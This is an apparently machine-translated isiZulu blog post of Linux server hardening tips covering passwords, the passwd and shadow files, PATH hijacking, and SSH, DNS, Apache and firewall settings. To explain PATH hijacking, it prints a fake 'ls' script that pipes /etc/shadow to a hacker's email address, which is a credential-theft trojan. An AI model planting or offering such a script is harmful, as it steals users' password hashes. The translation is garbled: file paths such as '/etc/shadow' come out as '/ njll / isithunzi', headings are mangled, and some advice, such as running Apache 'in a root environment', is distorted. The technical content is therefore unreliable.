Amathiphu Wokuphepha we-Linux Yakho (Iseva) (Ingxenye 1)

@Jlcmux

Imizuzu ye-5

Sekuyisikhathi eside ngingashicileli lutho kubhulogi futhi ngingathanda ukwabelana ngamathiphu athile avela encwadini ethi, (Phakathi kwabanye). Ngikutholile eNyuvesi futhi ngisanda kufunda futhi yize ngokuthembeka kuphelelwe yisikhathi futhi amasu akhonjisiwe mancane kakhulu amathuba okuthi asebenze ngenxa yokuvela kohlelo, nazo ziyizici ezithakazelisayo ezingakhonjiswa. 9788448140502

Ngifuna ukucacisa ukuthi yizeluleko ezibhekiswe ohlelweni lweLinux olusetshenziswa njengeseva, ngezinga eliphakathi noma mhlawumbe elikhulu, ngoba ezingeni lomsebenzisi wedeskithophu, yize zingasetshenziswa, ngeke zibe wusizo olukhulu.

Ngiyabona futhi ukuthi amathiphu asheshayo alula futhi ngeke ngingene emininingwaneni eminingi, yize ngihlela ukwenza okunye okuthunyelwe okuningana kakhulu futhi okubanzi kusihloko esithile. Kepha ngizokubona kamuva. Ake siqale.

Izinqubomgomo zephasiwedi. 

Yize kuzwakala njenge-catchphrase, ukuba nenqubomgomo yephasiwedi enhle kwenza umehluko phakathi kohlelo olusengozini noma cha. Ukuhlaselwa okufana ne- "brute force" kusizakala ngokuba ne-password embi ukufinyelela ohlelweni. Izeluleko ezivame kakhulu yilezi:

  • Hlanganisa usonhlamvukazi nosonhlamvukazi abancane.
  • Sebenzisa izinhlamvu ezikhethekile.
  • Izinombolo.
  • Ngaphezu kwamadijithi ayi-6 (ngethemba ukuthi angaphezulu kuka-8)

Ngaphezu kwalokhu, ake sicabangele amafayela amabili abalulekile.  / etc / passwd kanye / etc / shadow.

Okubaluleke kakhulu ukuthi ifayela / njll / passwd. Ngaphezu kokusinika igama lomsebenzisi, i-uid yakhe, indlela yefolda, i-bash .. njll. kwezinye izimo kukhombisa nokhiye obethelwe womsebenzisi.

 Ake sibheke ukwakheka kwayo okujwayelekile.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

umsebenzisi: cryptkey: uid: gid: path :: path: bash

Inkinga yangempela lapha, ukuthi leli fayela elithile linezimvume -rw-r-r– okusho ukuthi ifundile izimvume zanoma yimuphi umsebenzisi ohlelweni. nokuba nokhiye obetheliwe akunzima kakhulu ukucacisa okwangempela.

Kungakho ifayela likhona / njll / isithunzi. Leli yifayela lapho kugcinwa khona zonke izinkinobho zomsebenzisi, phakathi kwezinye izinto. Leli fayela linezimvume ezidingekayo ukuze kungabikho msebenzisi olifundayo.

Ukulungisa lokhu ngaleso sikhathi, kufanele siye kufayela / njll / passwd futhi ushintshe ukhiye obethelwe ube ngu "x", lokhu kuzogcina ukhiye kuphela kufayela lethu / njll / isithunzi.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Izinkinga nge-PATH ne .bashrc nezinye.

Lapho umsebenzisi enza umyalo kukhonsoli yakhe, uShell ubheka lowo myalo kuhlu lwemikhombandlela oluqukethwe kokuguquguqukayo kwemvelo kwe-PATH.

Uma uthayipha i- "echo $ PATH" kukhonsoli kuzokhipha into enjengale.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Ngawodwa ala mafolda kulapho igobolondo lizobheka khona umyalo obhalelwe ukuwenza. Yena "." kusho ukuthi ifolda yokuqala okufanele uyifune ifolda efanayo kusuka lapho kwenziwa khona umyalo.

Ake sithi kukhona umsebenzisi "uCarlos" futhi lo msebenzisi ufuna "ukwenza okubi." Lo msebenzisi angashiya ifayili elibizwa ngokuthi "ls" kufolda yakhe enkulu, futhi kuleli fayela enze umyalo ofana nalokhu:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Futhi uma umsebenzisi wezimpande wezinto lapho uya khona, ezama ukufaka amafolda ngaphakathi kwefolda ye-carlos (njengoba ibheka kuqala umyalo kuleyo folda efanayo, ungaqondile bekuzothumela ifayili elinamaphasiwedi kule imeyili bese kuba amafolda izofakwa ohlwini futhi ibingazukuthola kuze kube sebusuku.

Ukugwema lokho kufanele sisuse i- "." yokuguquguquka kwe-PATH.

Ngendlela efanayo, amafayela afana ne- / .bashrc, /.bashrc_profile, ./.login kufanele ahlolwe futhi ahlole ukuthi akukho "." ngokuguquguqukayo kwe-PATH, futhi empeleni kusuka kumafayela afana nalawa, ungashintsha indawo oya kuyo yomyalo othize.

Amathiphu ngezinsizakalo:

SHH

  • Khubaza inguqulo 1 ye-ssh protocol kufayela le-sshd_config.
  • Ungavumeli umsebenzisi wezimpande ukuthi angene ngemvume nge-ssh.
  • Amafayela namafolda ssh_host_key, ssh_host_dsa_key kanye ssh_host_rsa_key kufanele kufundwe kuphela ngumsebenzisi oyimpande.

THOLA

  • Shintsha umlayezo wokwamukela kufayela le-named.conf ukuze lingakhombisi inombolo yenguqulo
  • Khawulela ukudluliswa kwendawo, futhi unike amandla kuphela amaqembu akudingayo.

Apache

  • Vimbela insizakalo ekuboniseni inguqulo yakho kumyalezo wokumamukela Hlela ifayela le-httpd.conf bese ufaka noma uguqula imigqa:  

ServerSignature Off
ServerTokens Prod

  • Khubaza ukukhomba okuzenzakalelayo
  • Lungiselela i-apache ukuthi inganikezeli amafayela abucayi njenge-.htacces, * .inc, * .jsp .. njll
  • Susa amakhasi womuntu noma isampula kusuka kusevisi
  • Qalisa i-apache endaweni enezimpande

Ukuphepha Kwenethiwekhi.

Kubalulekile ukumboza konke okungenzeka kusistimu yakho kusuka kunethiwekhi yangaphandle, nazi izeluleko ezibalulekile zokuvimbela abangena ekuskeneni nasekutholakaleni ulwazi kunethiwekhi yakho.

Vimba ithrafikhi ye-ICMP

I-firewall kufanele ilungiselelwe ukuvimba zonke izinhlobo zethrafikhi engenayo nephumayo ye-ICMP nezimpendulo ze-echo. Ngalokhu ukugwema lokho, isibonelo, isithwebuli esifuna imishini ebukhoma ebangeni le-ip sikuthola. 

Gwema ukuskena kwe-TCP ping.

Enye indlela yokuskena isistimu yakho ukuskena kwe-TCP ping. Ake sithi kuseva yakho kukhona i-Apache server ethekwini 80. Lowo ongenayo angathumela isicelo se-ACK kulelo chweba, ngalokhu, uma uhlelo luphendula, ikhompyutha izobe isaphila futhi izoskena amanye amachweba.

Ngalokhu, i-firewall yakho kufanele ihlale inenketho "yokuqwashisa ngombuso" futhi kufanele ilahle wonke amaphakethe e-ACK angahambelani nokuxhumeka noma iseshini eseyenziwe ye-TCP.

Amanye amathiphu angeziwe:

  • Sebenzisa amasistimu e-IDS ukuthola ukuskena kwembobo kunethiwekhi yakho.
  • Lungiselela i-Firewall ukuze ingathembi izilungiselelo zembobo yomthombo wokuxhuma.

Lokhu kungenxa yokuthi amanye amaskena asebenzisa itheku lomthombo "mbumbulu" elinjengama-20 noma ama-53, ngoba amasistimu amaningi awethemba la machweba ngoba ajwayelekile ku-ftp noma i-DNS.

QAPHELA: Khumbula ukuthi iningi lezinkinga eziboniswe kulokhu okuthunyelwe selivele lixazululwe cishe kukho konke ukusatshalaliswa kwamanje. Kepha akukaze kube buhlungu ukuba nemininingwane esemqoka ngalezi zinkinga ukuze zingenzeki kuwe.

QAPHELA: Kamuva ngizobona isihloko esithile futhi ngizobhala okuthunyelwe okunemininingwane eminingi futhi yamanje.

Nyakazisa wonke umuntu ngokufunda.

Ukubingelela


Shiya umbono wakho

Ikheli lakho le ngeke ishicilelwe. Ezidingekayo ibhalwe nge *

*

*

  1. Ubhekele imininingwane: Miguel Ángel Gatón
  2. Inhloso yedatha: Lawula Ugaxekile, ukuphathwa kwamazwana.
  3. Ukusemthethweni: Imvume yakho
  4. Ukuxhumana kwemininingwane: Imininingwane ngeke idluliselwe kubantu besithathu ngaphandle kwesibopho esisemthethweni.
  5. Isitoreji sedatha: Idatabase ebanjwe yi-Occentus Networks (EU)
  6. Amalungelo: Nganoma yisiphi isikhathi ungakhawulela, uthole futhi ususe imininingwane yakho.

  1.   usosayensi wekhompyutha kusho
    kwenza iminyaka 8

    Ngisithande kakhulu lesi sihloko futhi nginentshisekelo kuleso sihloko, ngiyakukhuthaza ukuba uqhubeke nokulayisha okuqukethwe.

    Phendula ku-informatico